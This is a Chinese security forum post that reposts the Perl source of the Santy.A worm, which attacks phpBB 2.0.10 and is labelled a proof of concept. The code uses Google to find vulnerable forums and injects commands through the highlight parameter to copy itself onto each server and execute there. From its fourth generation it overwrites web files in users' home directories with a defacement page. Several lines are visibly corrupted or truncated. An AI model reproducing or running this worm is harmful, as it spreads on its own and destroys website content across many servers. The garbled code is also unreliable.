‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6831 
精华
834 
积分
36069 
阅读权限
255 
性别
男 
来自
中国 
在线时间
599 小时 
注册时间
2004-6-25 
最后登录
2008-12-3 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-12-22 13:13  只看该作者

Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)

信息来源:0day

Solution : Upgrade to phpBB version 2.0.11
复制内容到剪贴板
代码:
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
#                  ~~ For educational purpose ~~
#
# See : [url]http://isc.sans.org/diary.php?date=2004-12-21[/url]
#       [url]http://www.k-otik.com/news/20041221.phpbbworm.php[/url]
#       [url]http://www.f-secure.com/v-descs/santy_a.shtml[/url]
#
#!/usr/bin/perl
use
strict;
use Socket;


sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join &#39;&#39;, <IN>;
close IN;
unlink $0;

while(!GrabURL(&#39;[url]http://www.google.com/advanced_search[/url]&#39;)) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/&#39;my $generation = &#39; . ($1 + 1) . &#39;;&#39;/e;

my $selfFileName = &#39;m1ho2of&#39;;
my $markStr = &#39;HYv9po4z3jjHWanN&#39;;
my $perlOpen = &#39;perl -e "open OUT,q(>&#39; . $selfFileName . &#39;) and print q(&#39; . $markStr . &#39;)"&#39;;
my $tryCode = &#39;&highlight=%2527%252Esystem(&#39; . str2chr($perlOpen) . &#39;)%252e%2527&#39;;

while(1) {
exit if -e &#39;stop.it&#39;;

OUTER: for my $url (GoGoogle()) {

exit if -e &#39;stop.it&#39;;

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = &#39;&highlight=%2527%252Efwrite(fopen(&#39; . str2chr($selfFileName) . &#39;,&#39; . str2chr(&#39;a&#39;) . &#39;),
&#39; . str2chr($1) . &#39;),exit%252e%2527&#39;;

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = &#39;&highlight=%2527%252Esystem(&#39; . str2chr(&#39;perl &#39; . $selfFileName) . &#39;)%252e%2527&#39;;
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/&#39;chr(&#39; . or d($1) . &#39;)%252e&#39;/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = &#39;[url]http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all[/url]&#39; . &#39;&
q=allinurl%3A+%22viewtopic.php%22+%22&#39; . $ts[int(rand(@ts))] . &#39;%3D&#39; . int(rand(30000)) .
&#39;%22&btnG=Search&#39;;
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = &#39;<td><a href=(/search\?q=.+?)&#39; . &#39;><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>&#39;;
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL(&#39;[url]www.google.com[/url]&#39; . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#[url]http://.[/url]*[url]http://#i;[/url] # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^[url]http://##i;[/url]

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname(&#39;tcp&#39;)) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join &#39;&#39;, <Server>;
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= &#39;/&#39; unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne &#39;.&#39; and $_ ne &#39;..&#39; } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, &#39;/ &#39;);

for my $l (&#39;A&#39; .. &#39;Z&#39;) {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题